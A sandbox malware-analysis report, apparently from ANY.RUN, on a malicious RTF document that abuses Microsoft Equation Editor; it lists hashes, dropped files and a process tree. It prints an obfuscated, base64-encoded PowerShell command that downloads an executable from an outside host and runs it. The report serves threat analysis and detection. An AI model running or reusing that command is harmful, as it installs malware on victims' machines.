Field | Value
---|---
File name: | PDFT8559590555.doc
Full analysis: | https://app.any.run/tasks/74ccad0d-25b5-47f7-9b72-ab1f13733205
Verdict: | Malicious activity
Analysis date: | November 08, 2019, 14:54:40
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags: | 
Indicators: | 
MIME: | text/rtf
File info: | Rich Text Format data, version 1, unknown character set
Extension / detected type: | .rtf, Rich Text Format (100)
MD5: | EF7F56CA630F0612534EAA3CF388CDBA
SHA1: | 5420F1F4D693A96E5FB26C30428ED3661F12D171
SHA256: | 66800AFE021193F9309D890929652D06A05EA413E9E52AF6CD99EAED34BE4BAB
SSDEEP: | 96:Vo8TNHFxeaqMesAwlAaNlHWDDkxxPWnv+G6SOuuYVsce28zik1lNxi2Srx0ElERV:VJRFcPMesdllHeIPk+rNeAJrCnlERUcd
PID | CMD | Path | Indicators | Parent process | Process details
---|---|---|---|---|---
2420 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\PDFT8559590555.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft Word; Version: 14.0.6024.1000
3040 | "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | — | svchost.exe | User: admin; Company: Design Science, Inc.; Integrity Level: MEDIUM; Description: Microsoft Equation Editor; Exit code: 0; Version: 00110900
2356 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -noni -W Hidden -e aQBlAHgAIAAoACgAbgBlAHcALQBPAGIASgBlAGMAVAAgAFMAeQBzAFQAZQBtAC4AbgBlAFQALgBXAGUAQgBDAGwASQBlAE4AdAApAC4AZABPAHcAbgBMAG8AQQBEAGYASQBsAGUAKAAiAGgAdAB0AHAAOgAvAC8AdwBvAHIAbABkAGkAeABhAG0ALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwBwAGwAdQBnAGkAbgBzAC8AZABpAHIALwBqAG8ALgBlAHgAZQAiACwAIgAkAGUAbgB2ADoAdABlAG0AcABcAGIAYQBrAGQAcgBhAHcALgBlAHgAZQAiACkAKQA7AFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAiACQAZQBuAHYAOgB0AGUAbQBwAFwAYgBhAGsAZAByAGEAdwAuAGUAeABlACIA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | EQNEDT32.EXE | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows PowerShell; Exit code: 3221225794; Version: 6.1.7600.16385 (win7_rtm.090713-1255)
PID | Process | Filename | Type | MD5 | SHA256
---|---|---|---|---|---
2420 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRA68B.tmp.cvr | — | — | —
2420 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | D3E45E9E34C71A48C10FD945E9620BAF | 6CC7603DD408465CD9F4E0ED479443E49C34BDBCC43DE9FD1A9A1A1B8185537F
2420 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\1.a | text | 6EBD2C1A2AA5FBD9B94E2A4E25F86120 | 3C014B918F71B67E7A32A2A216F45E66DE972F71AD89CCB98D7DDD7F8EB842BD
2420 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$FT8559590555.doc | pgc | 790F4F679F4AE2773D27F3BC1F028CF3 | CFC4C7EEF3903AA2A16BB5CE166AC5CCE7D7526E64AE48A1451C720218C4A849